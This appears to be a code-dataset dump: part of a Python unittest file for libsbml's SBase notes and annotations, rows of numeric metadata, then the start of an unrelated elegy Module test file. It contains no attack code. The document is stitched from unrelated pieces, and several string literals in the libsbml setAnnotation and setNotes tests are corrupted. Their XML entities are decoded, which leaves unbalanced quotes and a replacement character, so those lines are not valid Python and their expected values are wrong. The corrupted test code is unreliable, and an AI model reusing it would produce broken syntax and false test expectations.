self.S.appendNotes(newnotes4)
notes4 = self.S.getNotesString()
self.assert_( self.S.isSetNotes() == True )
self.assert_(( notes4 == taggednewnotes2 ))
pass
def test_SBase_appendNotesString1(self):
notes = wrapString("<html xmlns=\"http://www.w3.org/1999/xhtml\">\n" + " <head>\n" +
" <title/>\n" +
" </head>\n" +
" <body>\n" +
" <p>This is a test note </p>\n" +
" </body>\n" +
"</html>")
taggednewnotes = wrapString("<notes>\n" +
" <html xmlns=\"http://www.w3.org/1999/xhtml\">\n" +
" <head>\n" +
" <title/>\n" +
" </head>\n" +
" <body>\n" +
" <p>This is a test note </p>\n" +
" <p>This is more test notes </p>\n" +
" </body>\n" +
" </html>\n" +
"</notes>")
addnotes = wrapString("<html xmlns=\"http://www.w3.org/1999/xhtml\">\n" + " <head>\n" +
" <title/>\n" +
" </head>\n" +
" <body>\n" +
" <p>This is more test notes </p>\n" +
" </body>\n" +
"</html>")
addnotes2 = wrapString("<notes>\n" +
" <html xmlns=\"http://www.w3.org/1999/xhtml\">\n" +
" <head>\n" +
" <title/>\n" +
" </head>\n" +
" <body>\n" +
" <p>This is more test notes </p>\n" +
" </body>\n" +
" </html>\n" +
"</notes>")
self.S.setNotes(notes)
self.S.appendNotes(addnotes)
notes1 = self.S.getNotesString()
self.assert_( self.S.isSetNotes() == True )
self.assert_(( notes1 == taggednewnotes ))
self.S.setNotes(notes)
self.S.appendNotes(addnotes2)
notes2 = self.S.getNotesString()
self.assert_( self.S.isSetNotes() == True )
self.assert_(( notes2 == taggednewnotes ))
pass
def test_SBase_appendNotesString2(self):
notes = wrapString("<html xmlns=\"http://www.w3.org/1999/xhtml\">\n" + " <head>\n" +
" <title/>\n" +
" </head>\n" +
" <body>\n" +
" <p>This is a test note </p>\n" +
" </body>\n" +
"</html>")
taggednewnotes = wrapString("<notes>\n" +
" <html xmlns=\"http://www.w3.org/1999/xhtml\">\n" +
" <head>\n" +
" <title/>\n" +
" </head>\n" +
" <body>\n" +
" <p>This is a test note </p>\n" +
" <p>This is more test notes </p>\n" +
" </body>\n" +
" </html>\n" +
"</notes>")
addnotes = wrapString("<body xmlns=\"http://www.w3.org/1999/xhtml\">\n" + " <p>This is more test notes </p>\n" + "</body>\n")
addnotes2 = wrapString("<notes>\n" +
" <body xmlns=\"http://www.w3.org/1999/xhtml\">\n" +
" <p>This is more test notes </p>\n" +
" </body>\n" +
"</notes>")
self.S.setNotes(notes)
self.S.appendNotes(addnotes)
notes1 = self.S.getNotesString()
self.assert_( self.S.isSetNotes() == True )
self.assert_(( notes1 == taggednewnotes ))
self.S.setNotes(notes)
self.S.appendNotes(addnotes2)
notes2 = self.S.getNotesString()
self.assert_( self.S.isSetNotes() == True )
self.assert_(( notes2 == taggednewnotes ))
pass
def test_SBase_appendNotesString3(self):
notes = wrapString("<html xmlns=\"http://www.w3.org/1999/xhtml\">\n" + " <head>\n" +
" <title/>\n" +
" </head>\n" +
" <body>\n" +
" <p>This is a test note </p>\n" +
" </body>\n" +
"</html>")
taggednewnotes = wrapString("<notes>\n" +
" <html xmlns=\"http://www.w3.org/1999/xhtml\">\n" +
" <head>\n" +
" <title/>\n" +
" </head>\n" +
" <body>\n" +
" <p>This is a test note </p>\n" +
" <p xmlns=\"http://www.w3.org/1999/xhtml\">This is more test notes </p>\n" +
" </body>\n" +
" </html>\n" +
"</notes>")
taggednewnotes2 = wrapString("<notes>\n" +
" <html xmlns=\"http://www.w3.org/1999/xhtml\">\n" +
" <head>\n" +
" <title/>\n" +
" </head>\n" +
" <body>\n" +
" <p>This is a test note </p>\n" +
" <p xmlns=\"http://www.w3.org/1999/xhtml\">This is more test notes 1</p>\n" +
" <p xmlns=\"http://www.w3.org/1999/xhtml\">This is more test notes 2</p>\n" +
" </body>\n" +
" </html>\n" +
"</notes>")
addnotes = "<p xmlns=\"http://www.w3.org/1999/xhtml\">This is more test notes </p>\n";
addnotes2 = "<p xmlns=\"http://www.w3.org/1999/xhtml\">This is more test notes 1</p>\n" + "<p xmlns=\"http://www.w3.org/1999/xhtml\">This is more test notes 2</p>";
addnotes3 = wrapString("<notes>\n" + " <p xmlns=\"http://www.w3.org/1999/xhtml\">This is more test notes </p>\n" + "</notes>")
addnotes4 = wrapString("<notes>\n" + " <p xmlns=\"http://www.w3.org/1999/xhtml\">This is more test notes 1</p>\n" +
" <p xmlns=\"http://www.w3.org/1999/xhtml\">This is more test notes 2</p>\n" +
"</notes>")
self.S.setNotes(notes)
self.S.appendNotes(addnotes)
notes1 = self.S.getNotesString()
self.assert_( self.S.isSetNotes() == True )
self.assert_(( notes1 == taggednewnotes ))
self.S.setNotes(notes)
self.S.appendNotes(addnotes2)
notes2 = self.S.getNotesString()
self.assert_( self.S.isSetNotes() == True )
self.assert_(( notes2 == taggednewnotes2 ))
self.S.setNotes(notes)
self.S.appendNotes(addnotes3)
notes3 = self.S.getNotesString()
self.assert_( self.S.isSetNotes() == True )
self.assert_(( notes3 == taggednewnotes ))
self.S.setNotes(notes)
self.S.appendNotes(addnotes4)
notes4 = self.S.getNotesString()
self.assert_( self.S.isSetNotes() == True )
self.assert_(( notes4 == taggednewnotes2 ))
pass
def test_SBase_appendNotesString4(self):
notes = wrapString("<body xmlns=\"http://www.w3.org/1999/xhtml\">\n" + " <p>This is a test note </p>\n" + "</body>")
taggednewnotes = wrapString("<notes>\n" +
" <html xmlns=\"http://www.w3.org/1999/xhtml\">\n" +
" <head>\n" +
" <title/>\n" +
" </head>\n" +
" <body>\n" +
" <p>This is a test note </p>\n" +
" <p>This is more test notes </p>\n" +
" </body>\n" +
" </html>\n" +
"</notes>")
addnotes = wrapString("<html xmlns=\"http://www.w3.org/1999/xhtml\">\n" + " <head>\n" +
" <title/>\n" +
" </head>\n" +
" <body>\n" +
" <p>This is more test notes </p>\n" +
" </body>\n" +
"</html>")
addnotes2 = wrapString("<notes>\n" +
" <html xmlns=\"http://www.w3.org/1999/xhtml\">\n" +
" <head>\n" +
" <title/>\n" +
" </head>\n" +
" <body>\n" +
" <p>This is more test notes </p>\n" +
" </body>\n" +
" </html>\n" +
"</notes>")
self.S.setNotes(notes)
self.S.appendNotes(addnotes)
notes1 = self.S.getNotesString()
self.assert_( self.S.isSetNotes() == True )
self.assert_(( notes1 == taggednewnotes ))
self.S.setNotes(notes)
self.S.appendNotes(addnotes2)
notes2 = self.S.getNotesString()
self.assert_( self.S.isSetNotes() == True )
self.assert_(( notes2 == taggednewnotes ))
pass
def test_SBase_appendNotesString5(self):
notes = "<p xmlns=\"http://www.w3.org/1999/xhtml\">This is a test note </p>";
taggednewnotes = wrapString("<notes>\n" +
" <html xmlns=\"http://www.w3.org/1999/xhtml\">\n" +
" <head>\n" +
" <title/>\n" +
" </head>\n" +
" <body>\n" +
" <p xmlns=\"http://www.w3.org/1999/xhtml\">This is a test note </p>\n" +
" <p>This is more test notes </p>\n" +
" </body>\n" +
" </html>\n" +
"</notes>")
addnotes = wrapString("<html xmlns=\"http://www.w3.org/1999/xhtml\">\n" + " <head>\n" +
" <title/>\n" +
" </head>\n" +
" <body>\n" +
" <p>This is more test notes </p>\n" +
" </body>\n" +
"</html>")
addnotes2 = wrapString("<notes>\n" +
" <html xmlns=\"http://www.w3.org/1999/xhtml\">\n" +
" <head>\n" +
" <title/>\n" +
" </head>\n" +
" <body>\n" +
" <p>This is more test notes </p>\n" +
" </body>\n" +
" </html>\n" +
"</notes>")
self.S.setNotes(notes)
self.S.appendNotes(addnotes)
notes1 = self.S.getNotesString()
self.assert_( self.S.isSetNotes() == True )
self.assert_(( notes1 == taggednewnotes ))
self.S.setNotes(notes)
self.S.appendNotes(addnotes2)
notes2 = self.S.getNotesString()
self.assert_( self.S.isSetNotes() == True )
self.assert_(( notes2 == taggednewnotes ))
pass
def test_SBase_appendNotesString6(self):
notes = wrapString("<body xmlns=\"http://www.w3.org/1999/xhtml\">\n" + " <p>This is a test note </p>\n" + "</body>")
taggednewnotes = wrapString("<notes>\n" +
" <body xmlns=\"http://www.w3.org/1999/xhtml\">\n" +
" <p>This is a test note </p>\n" +
" <p>This is more test notes </p>\n" +
" </body>\n" +
"</notes>")
addnotes = wrapString("<body xmlns=\"http://www.w3.org/1999/xhtml\">\n" + " <p>This is more test notes </p>\n" + "</body>")
addnotes2 = wrapString("<notes>\n" +
" <body xmlns=\"http://www.w3.org/1999/xhtml\">\n" +
" <p>This is more test notes </p>\n" +
" </body>\n" +
"</notes>")
self.S.setNotes(notes)
self.S.appendNotes(addnotes)
notes1 = self.S.getNotesString()
self.assert_( self.S.isSetNotes() == True )
self.assert_(( notes1 == taggednewnotes ))
self.S.setNotes(notes)
self.S.appendNotes(addnotes2)
notes2 = self.S.getNotesString()
self.assert_( self.S.isSetNotes() == True )
self.assert_(( notes2 == taggednewnotes ))
pass
def test_SBase_appendNotesString7(self):
notes = "<p xmlns=\"http://www.w3.org/1999/xhtml\">This is a test note </p>";
taggednewnotes = wrapString("<notes>\n" +
" <body xmlns=\"http://www.w3.org/1999/xhtml\">\n" +
" <p xmlns=\"http://www.w3.org/1999/xhtml\">This is a test note </p>\n" +
" <p>This is more test notes </p>\n" +
" </body>\n" +
"</notes>")
addnotes = wrapString("<body xmlns=\"http://www.w3.org/1999/xhtml\">\n" + " <p>This is more test notes </p>\n" + "</body>")
addnotes2 = wrapString("<notes>\n" +
" <body xmlns=\"http://www.w3.org/1999/xhtml\">\n" +
" <p>This is more test notes </p>\n" +
" </body>\n" +
"</notes>")
self.S.setNotes(notes)
self.S.appendNotes(addnotes)
notes1 = self.S.getNotesString()
self.assert_( self.S.isSetNotes() == True )
self.assert_(( notes1 == taggednewnotes ))
self.S.setNotes(notes)
self.S.appendNotes(addnotes2)
notes2 = self.S.getNotesString()
self.assert_( self.S.isSetNotes() == True )
self.assert_(( notes2 == taggednewnotes ))
pass
def test_SBase_appendNotesString8(self):
notes = wrapString("<body xmlns=\"http://www.w3.org/1999/xhtml\">\n" + " <p>This is a test note </p>\n" + "</body>")
taggednewnotes = ("<notes>\n" +
" <body xmlns=\"http://www.w3.org/1999/xhtml\">\n" +
" <p>This is a test note </p>\n" +
" <p xmlns=\"http://www.w3.org/1999/xhtml\">This is more test notes </p>\n" +
" </body>\n" +
"</notes>")
taggednewnotes2 = ("<notes>\n" +
" <body xmlns=\"http://www.w3.org/1999/xhtml\">\n" +
" <p>This is a test note </p>\n" +
" <p xmlns=\"http://www.w3.org/1999/xhtml\">This is more test notes 1</p>\n" +
" <p xmlns=\"http://www.w3.org/1999/xhtml\">This is more test notes 2</p>\n" +
" </body>\n" +
"</notes>")
addnotes = "<p xmlns=\"http://www.w3.org/1999/xhtml\">This is more test notes </p>";
addnotes2 = "<p xmlns=\"http://www.w3.org/1999/xhtml\">This is more test notes 1</p>\n" + "<p xmlns=\"http://www.w3.org/1999/xhtml\">This is more test notes 2</p>";
addnotes3 = wrapString("<notes>\n" +
" <p xmlns=\"http://www.w3.org/1999/xhtml\">This is more test notes </p>\n" +
"</notes>")
addnotes4 = wrapString("<notes>\n" +
" <p xmlns=\"http://www.w3.org/1999/xhtml\">This is more test notes 1</p>\n" +
" <p xmlns=\"http://www.w3.org/1999/xhtml\">This is more test notes 2</p>\n" +
"</notes>")
self.S.setNotes(notes)
self.S.appendNotes(addnotes)
notes1 = self.S.getNotesString()
self.assert_( self.S.isSetNotes() == True )
self.assert_(( notes1 == taggednewnotes ))
self.S.setNotes(notes)
self.S.appendNotes(addnotes2)
notes2 = self.S.getNotesString()
self.assert_( self.S.isSetNotes() == True )
self.assert_(( notes2 == taggednewnotes2 ))
self.S.setNotes(notes)
self.S.appendNotes(addnotes3)
notes3 = self.S.getNotesString()
self.assert_( self.S.isSetNotes() == True )
self.assert_(( notes3 == taggednewnotes ))
self.S.setNotes(notes)
self.S.appendNotes(addnotes4)
notes4 = self.S.getNotesString()
self.assert_( self.S.isSetNotes() == True )
self.assert_(( notes4 == taggednewnotes2 ))
pass
def test_SBase_getQualifiersFromResources(self):
cv = libsbml.CVTerm(libsbml.BIOLOGICAL_QUALIFIER)
cv.setBiologicalQualifierType(libsbml.BQB_ENCODES)
cv.addResource( "foo")
self.S.setMetaId( "sbase1")
self.S.addCVTerm(cv)
self.assert_( self.S.getResourceBiologicalQualifier( "foo") == libsbml.BQB_ENCODES )
cv1 = libsbml.CVTerm(libsbml.MODEL_QUALIFIER)
cv1.setModelQualifierType(libsbml.BQM_IS)
cv1.addResource( "bar")
self.S.addCVTerm(cv1)
self.assert_( self.S.getResourceModelQualifier( "bar") == libsbml.BQM_IS )
_dummyList = [ cv ]; _dummyList[:] = []; del _dummyList
_dummyList = [ cv1 ]; _dummyList[:] = []; del _dummyList
pass
def test_SBase_setAnnotation(self):
token = libsbml.XMLToken("This is a test note")
node = libsbml.XMLNode(token)
self.S.setAnnotation(node)
self.assert_( self.S.isSetAnnotation() == True )
t1 = self.S.getAnnotation()
self.assert_( t1.getNumChildren() == 1 )
self.assert_(( "This is a test note" == t1.getChild(0).getCharacters() ))
if (self.S.getAnnotation() == node):
pass
self.S.setAnnotation(self.S.getAnnotation())
self.assert_(( "This is a test note" == self.S.getAnnotation().getChild(0).getCharacters() ))
self.S.setAnnotation(None)
self.assert_( self.S.isSetAnnotation() == False )
if (self.S.getAnnotation() != None):
pass
self.S.setAnnotation(node)
self.assert_( self.S.isSetAnnotation() == True )
self.S.unsetAnnotation()
self.assert_( self.S.isSetAnnotation() == False )
token = libsbml.XMLToken("(CR) ¨ ¨ ¨ (NOT CR) &#; &#x; �a8; ¨ ¨")
node = libsbml.XMLNode(token)
self.S.setAnnotation(node)
t1 = self.S.getAnnotation()
self.assert_( t1.getNumChildren() == 1 )
s = t1.getChild(0).toXMLString()
expected = "(CR) ¨ ¨ ¨ (NOT CR) &#; &#x; &#00a8; &#0168 &#x00a8";
self.assert_(( expected == s ))
token = libsbml.XMLToken("& ' > < \" & ' > < "")
node = libsbml.XMLNode(token)
self.S.setAnnotation(node)
t1 = self.S.getAnnotation()
self.assert_( t1.getNumChildren() == 1 )
s2 = t1.getChild(0).toXMLString()
expected2 = "& ' > < " & ' > < "";
self.assert_(( expected2 == s2 ))
_dummyList = [ token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ node ]; _dummyList[:] = []; del _dummyList
pass
def test_SBase_setAnnotationString(self):
annotation = "This is a test note";
taggedannotation = "<annotation>This is a test note</annotation>";
self.S.setAnnotation(annotation)
self.assert_( self.S.isSetAnnotation() == True )
if (( taggedannotation != self.S.getAnnotationString() )):
pass
t1 = self.S.getAnnotation()
self.assert_( t1.getNumChildren() == 1 )
self.assert_(( "This is a test note" == t1.getChild(0).getCharacters() ))
self.S.setAnnotation(self.S.getAnnotationString())
t1 = self.S.getAnnotation()
self.assert_( t1.getNumChildren() == 1 )
chars = self.S.getAnnotationString()
self.assert_(( taggedannotation == chars ))
self.S.setAnnotation( "")
self.assert_( self.S.isSetAnnotation() == False )
if (self.S.getAnnotationString() != None):
pass
self.S.setAnnotation(taggedannotation)
self.assert_( self.S.isSetAnnotation() == True )
if (( taggedannotation != self.S.getAnnotationString() )):
pass
t1 = self.S.getAnnotation()
self.assert_( t1.getNumChildren() == 1 )
t2 = t1.getChild(0)
self.assert_(( "This is a test note" == t2.getCharacters() ))
pass
def test_SBase_setMetaId(self):
metaid = "x12345";
self.S.setMetaId(metaid)
self.assert_(( metaid == self.S.getMetaId() ))
self.assertEqual( True, self.S.isSetMetaId() )
if (self.S.getMetaId() == metaid):
pass
self.S.setMetaId(self.S.getMetaId())
self.assert_(( metaid == self.S.getMetaId() ))
self.S.setMetaId("")
self.assertEqual( False, self.S.isSetMetaId() )
if (self.S.getMetaId() != None):
pass
pass
def test_SBase_setNotes(self):
c = libsbml.Model(1,2)
token = libsbml.XMLToken("This is a test note")
node = libsbml.XMLNode(token)
c.setNotes(node)
self.assert_( c.isSetNotes() == True )
if (c.getNotes() == node):
pass
t1 = c.getNotes()
self.assert_( t1.getNumChildren() == 1 )
self.assert_(( "This is a test note" == t1.getChild(0).getCharacters() ))
c.setNotes(c.getNotes())
t1 = c.getNotes()
self.assert_( t1.getNumChildren() == 1 )
chars = t1.getChild(0).getCharacters()
self.assert_(( "This is a test note" == chars ))
c.setNotes(None)
self.assert_( c.isSetNotes() == False )
if (c.getNotes() != None):
pass
c.setNotes(node)
self.assert_( c.isSetNotes() == True )
token = libsbml.XMLToken("(CR) ¨ ¨ ¨ (NOT CR) &#; &#x; �a8; ¨ ¨")
node = libsbml.XMLNode(token)
c.setNotes(node)
t1 = c.getNotes()
self.assert_( t1.getNumChildren() == 1 )
s = t1.getChild(0).toXMLString()
expected = "(CR) ¨ ¨ ¨ (NOT CR) &#; &#x; &#00a8; &#0168 &#x00a8";
self.assert_(( expected == s ))
token = libsbml.XMLToken("& ' > < \" & ' > < "")
node = libsbml.XMLNode(token)
c.setNotes(node)
t1 = c.getNotes()
self.assert_( t1.getNumChildren() == 1 )
s2 = t1.getChild(0).toXMLString()
expected2 = "& ' > < " & ' > < "";
self.assert_(( expected2 == s2 ))
_dummyList = [ token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ node ]; _dummyList[:] = []; del _dummyList
pass
def test_SBase_setNotesString(self):
c = libsbml.Model(1,2)
notes = "This is a test note";
taggednotes = "<notes>This is a test note</notes>";
c.setNotes(notes)
self.assert_( c.isSetNotes() == True )
if (( taggednotes != c.getNotesString() )):
pass
t1 = c.getNotes()
self.assert_( t1.getNumChildren() == 1 )
t2 = t1.getChild(0)
self.assert_(( "This is a test note" == t2.getCharacters() ))
c.setNotes(c.getNotesString())
t1 = c.getNotes()
self.assert_( t1.getNumChildren() == 1 )
chars = c.getNotesString()
self.assert_(( taggednotes == chars ))
c.setNotes("")
self.assert_( c.isSetNotes() == False )
if (c.getNotesString() != None):
pass
c.setNotes(taggednotes)
self.assert_( c.isSetNotes() == True )
if (( taggednotes != c.getNotesString() )):
pass
t1 = c.getNotes()
self.assert_( t1.getNumChildren() == 1 )
t2 = t1.getChild(0)
self.assert_(( "This is a test note" == t2.getCharacters() ))
pass
def test_SBase_setNotesString_l3(self):
c = libsbml.Model(3,1)
notes = "This is a test note";
c.setNotes(notes)
self.assert_( c.isSetNotes() == False )
pass
def test_SBase_setNotesString_l3_addMarkup(self):
c = libsbml.Model(3,1)
notes = "This is a test note";
taggednotes = wrapString("<notes>\n" + " <p xmlns=\"http://www.w3.org/1999/xhtml\">This is a test note</p>\n" +
"</notes>")
c.setNotes(notes, True)
self.assert_( c.isSetNotes() == True )
if (( taggednotes != c.getNotesString() )):
pass
t1 = c.getNotes()
self.assert_( t1.getNumChildren() == 1 )
t2 = t1.getChild(0)
self.assert_( t2.getNumChildren() == 1 )
t3 = t2.getChild(0)
self.assert_(( "This is a test note" == t3.getCharacters() ))
c.setNotes(c.getNotesString(), True)
t1 = c.getNotes()
self.assert_( t1.getNumChildren() == 1 )
chars = c.getNotesString()
self.assert_(( taggednotes == chars ))
c.setNotes("", True)
self.assert_( c.isSetNotes() == False )
if (c.getNotesString() != None):
pass
c.setNotes(taggednotes, True)
self.assert_( c.isSetNotes() == True )
if (( taggednotes != c.getNotesString() )):
pass
t1 = c.getNotes()
self.assert_( t1.getNumChildren() == 1 )
t2 = t1.getChild(0)
self.assert_( t2.getNumChildren() == 1 )
t3 = t2.getChild(0)
self.assert_(( "This is a test note" == t3.getCharacters() ))
pass
def test_SBase_unsetAnnotationWithCVTerms(self):
annt = wrapString("<annotation>\n" +
" <test:test xmlns:test=\"http://test.org/test\">this is a test node</test:test>\n" +
"</annotation>")
annt_with_cvterm = wrapString("<annotation>\n" +
" <test:test xmlns:test=\"http://test.org/test\">this is a test node</test:test>\n" +
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" " +
"xmlns:dc=\"http://purl.org/dc/elements/1.1/\" " +
"xmlns:dcterms=\"http://purl.org/dc/terms/\" " +
"xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" " +
"xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" " +
"xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n" +
" <rdf:Description rdf:about=\"#_000001\">\n" +
" <bqbiol:is>\n" +
" <rdf:Bag>\n" +
" <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0005895\"/>\n" +
" </rdf:Bag>\n" +
" </bqbiol:is>\n" +
" </rdf:Description>\n" +
" </rdf:RDF>\n" +
"</annotation>")
self.S.setAnnotation(annt)
self.assert_( self.S.isSetAnnotation() == True )
self.assert_(( annt == self.S.getAnnotationString() ))
self.S.unsetAnnotation()
self.assert_( self.S.isSetAnnotation() == False )
self.assert_( self.S.getAnnotation() == None )
self.S.setAnnotation(annt)
self.S.setMetaId( "_000001")
cv = libsbml.CVTerm(libsbml.BIOLOGICAL_QUALIFIER)
cv.setBiologicalQualifierType(libsbml.BQB_IS)
cv.addResource( "http://www.geneontology.org/#GO:0005895")
self.S.addCVTerm(cv)
self.assert_( self.S.isSetAnnotation() == True )
self.assert_(( annt_with_cvterm == self.S.getAnnotationString() ))
self.S.unsetAnnotation()
self.assert_( self.S.isSetAnnotation() == False )
self.assert_( self.S.getAnnotation() == None )
_dummyList = [ cv ]; _dummyList[:] = []; del _dummyList
pass
def test_SBase_unsetAnnotationWithModelHistory(self):
h = libsbml.ModelHistory()
c = libsbml.ModelCreator()
annt = wrapString("<annotation>\n" +
" <test:test xmlns:test=\"http://test.org/test\">this is a test node</test:test>\n" +
"</annotation>")
annt_with_modelhistory = wrapString("<annotation>\n" +
" <test:test xmlns:test=\"http://test.org/test\">this is a test node</test:test>\n" +
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" " +
"xmlns:dc=\"http://purl.org/dc/elements/1.1/\" " +
"xmlns:dcterms=\"http://purl.org/dc/terms/\" " +
"xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" " +
"xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" " +
"xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n" +
" <rdf:Description rdf:about=\"#_000001\">\n" +
" <dc:creator>\n" +
" <rdf:Bag>\n" +
" <rdf:li rdf:parseType=\"Resource\">\n" +
" <vCard:N rdf:parseType=\"Resource\">\n" +
" <vCard:Family>Keating</vCard:Family>\n" +
" <vCard:Given>Sarah</vCard:Given>\n" +
" </vCard:N>\n" +
" <vCard:EMAIL>sbml-team@caltech.edu</vCard:EMAIL>\n" +
" </rdf:li>\n" +
" </rdf:Bag>\n" +
" </dc:creator>\n" +
" <dcterms:created rdf:parseType=\"Resource\">\n" +
" <dcterms:W3CDTF>2005-12-29T12:15:45+02:00</dcterms:W3CDTF>\n" +
" </dcterms:created>\n" +
" <dcterms:modified rdf:parseType=\"Resource\">\n" +
" <dcterms:W3CDTF>2005-12-30T12:15:45+02:00</dcterms:W3CDTF>\n" +
" </dcterms:modified>\n" +
" </rdf:Description>\n" +
" </rdf:RDF>\n" +
"</annotation>")
self.S.setAnnotation(annt)
self.assert_( self.S.isSetAnnotation() == True )
self.assert_(( annt == self.S.getAnnotationString() ))
self.S.unsetAnnotation()
self.assert_( self.S.isSetAnnotation() == False )
self.assert_( self.S.getAnnotation() == None )
self.S.setAnnotation(annt)
self.S.setMetaId( "_000001")
c.setFamilyName("Keating")
c.setGivenName("Sarah")
c.setEmail("sbml-team@caltech.edu")
h.addCreator(c)
dc = libsbml.Date(2005,12,29,12,15,45,1,2,0)
h.setCreatedDate(dc)
dm = libsbml.Date(2005,12,30,12,15,45,1,2,0)
h.setModifiedDate(dm)
self.S.setModelHistory(h)
self.assert_( self.S.isSetAnnotation() == True )
self.assert_(( annt_with_modelhistory == self.S.getAnnotationString() ))
self.S.unsetAnnotation()
self.assert_( self.S.isSetAnnotation() == False )
self.assert_( self.S.getAnnotation() == None )
_dummyList = [ c ]; _dummyList[:] = []; del _dummyList
_dummyList = [ h ]; _dummyList[:] = []; del _dummyList
pass
def test_SBase_unsetCVTerms(self):
cv = libsbml.CVTerm(libsbml.BIOLOGICAL_QUALIFIER)
cv.setBiologicalQualifierType(libsbml.BQB_ENCODES)
cv.addResource( "foo")
self.S.setMetaId( "sbase1")
self.S.addCVTerm(cv)
cv1 = libsbml.CVTerm(libsbml.BIOLOGICAL_QUALIFIER)
cv1.setBiologicalQualifierType(libsbml.BQB_IS)
cv1.addResource( "bar")
self.S.addCVTerm(cv1)
cv2 = libsbml.CVTerm(libsbml.BIOLOGICAL_QUALIFIER)
cv2.setBiologicalQualifierType(libsbml.BQB_IS)
cv2.addResource( "bar1")
self.S.addCVTerm(cv2)
cv4 = libsbml.CVTerm(libsbml.BIOLOGICAL_QUALIFIER)
cv4.setBiologicalQualifierType(libsbml.BQB_IS)
cv4.addResource( "bar1")
self.S.addCVTerm(cv4)
self.assert_( self.S.getNumCVTerms() == 2 )
self.S.unsetCVTerms()
self.assert_( self.S.getNumCVTerms() == 0 )
#self.assert_( self.S.getCVTerms() == None )
self.assert_( len(self.S.getCVTerms()) == 0 )
_dummyList = [ cv ]; _dummyList[:] = []; del _dummyList
_dummyList = [ cv2 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ cv1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ cv4 ]; _dummyList[:] = []; del _dummyList
pass
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestSBase))
return suite
if __name__ == "__main__":
if unittest.TextTestRunner(verbosity=1).run(suite()).wasSuccessful() :
sys.exit(0)
else:
sys.exit(1)
| 43.157711
| 168
| 0.622136
| 7,423
| 61,845
| 5.00229
| 0.04769
| 0.071098
| 0.091619
| 0.11715
| 0.906173
| 0.891226
| 0.879673
| 0.866072
| 0.856377
| 0.844501
| 0
| 0.026813
| 0.199159
| 61,845
| 1,432
| 169
| 43.187849
| 0.722904
| 0.023704
| 0
| 0.864407
| 0
| 0.003685
| 0.136401
| 0.004706
| 0.002211
| 0
| 0
| 0
| 0.193073
| 1
| 0.025792
| false
| 0.036846
| 0.002211
| 0
| 0.030951
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
71cf82ff6ae273ede1b27f6d9c1b75e91a92ed07
| 7,945
|
py
|
Python
|
elegy/module_test.py
|
abhinavsp0730/elegy
|
d3e6ebba0d56b5d9a489f75c9512eb8aaf214c6d
|
[
"Apache-2.0"
] | null | null | null |
elegy/module_test.py
|
abhinavsp0730/elegy
|
d3e6ebba0d56b5d9a489f75c9512eb8aaf214c6d
|
[
"Apache-2.0"
] | null | null | null |
elegy/module_test.py
|
abhinavsp0730/elegy
|
d3e6ebba0d56b5d9a489f75c9512eb8aaf214c6d
|
[
"Apache-2.0"
] | null | null | null |
import inspect
from unittest import TestCase
import jax
import jax.numpy as jnp
import pytest
import elegy
from elegy import utils
import numpy as np
class ModuleTest(TestCase):
class Linear(elegy.Module):
def __init__(self, units):
super().__init__()
self.units = units
def call(self, x):
w = elegy.get_parameter(
"w", [x.shape[-1], self.units], initializer=jnp.ones
)
b = elegy.get_parameter("b", [self.units], initializer=jnp.ones)
n = elegy.get_state("n", [], dtype=jnp.int32, initializer=jnp.zeros)
elegy.set_state("n", n + 1)
y = jnp.dot(x, w) + b
elegy.add_loss("activation_sum", jnp.sum(y))
elegy.add_metric("activation_mean", jnp.mean(y))
return y
class MyModule(elegy.Module):
def __init__(self):
super().__init__()
self.linear = ModuleTest.Linear(6)
self.linear1 = ModuleTest.Linear(7)
def call(self, x) -> np.ndarray:
x = self.linear(x)
x = self.linear1(x)
self.bias = elegy.get_parameter(
"bias", [x.shape[-1]], jnp.float32, jnp.ones
)
return x + self.bias * 10
def test_basic(self):
x = np.random.uniform(-1, 1, size=(4, 5))
module = ModuleTest.MyModule()
module.init()(x)
y: np.ndarray
y, context = module.apply()(x)
assert y.shape == (4, 7)
print(module.get_parameters())
def test_get_parameters(self):
x = np.random.uniform(-1, 1, size=(4, 5))
m = ModuleTest.MyModule()
m.init()(x)
parameters = m.get_parameters()
states = m.get_states()
assert "bias" in parameters
assert "linear" in parameters
assert "w" in parameters["linear"]
assert "b" in parameters["linear"]
assert states["linear"]["n"] == 0
assert states["linear1"]["n"] == 0
assert "linear1" in parameters
y: np.ndarray
y, context = m.apply(get_summaries=True)(x)
parameters = m.get_parameters()
states = m.get_states()
assert y.shape == (4, 7)
assert "bias" in parameters
assert "linear" in parameters
assert "w" in parameters["linear"]
assert "b" in parameters["linear"]
assert m.linear.get_states()["n"] == 1
assert states["linear"]["n"] == 1
assert "linear1" in parameters
assert "activation_sum_loss" in context.losses
assert "my_module/linear/activation_mean" in context.metrics
assert "my_module/linear_1/activation_mean" in context.metrics
assert context.summaries[0][:2] == (m.linear, "my_module/linear")
assert context.summaries[0][2].shape == (4, 6)
assert context.summaries[1][:2] == (m.linear1, "my_module/linear_1")
assert context.summaries[1][2].shape == (4, 7)
assert context.summaries[2][:2] == (m, "my_module")
assert context.summaries[2][2].shape == (4, 7)
m.set_parameters(jax.tree_map(lambda x: -x, parameters))
parameters = m.get_parameters()
states = m.get_states()
assert parameters["bias"][0] == -1
assert m.linear.get_parameters()["w"][0, 0] == -1
assert m.linear.get_parameters()["b"][0] == -1
assert m.linear1.get_parameters()["w"][0, 0] == -1
assert m.linear1.get_parameters()["b"][0] == -1
assert m.parameters_size(include_submodules=False) == 7
current_parameters = m.get_parameters()
current_states = m.get_states()
m.reset()
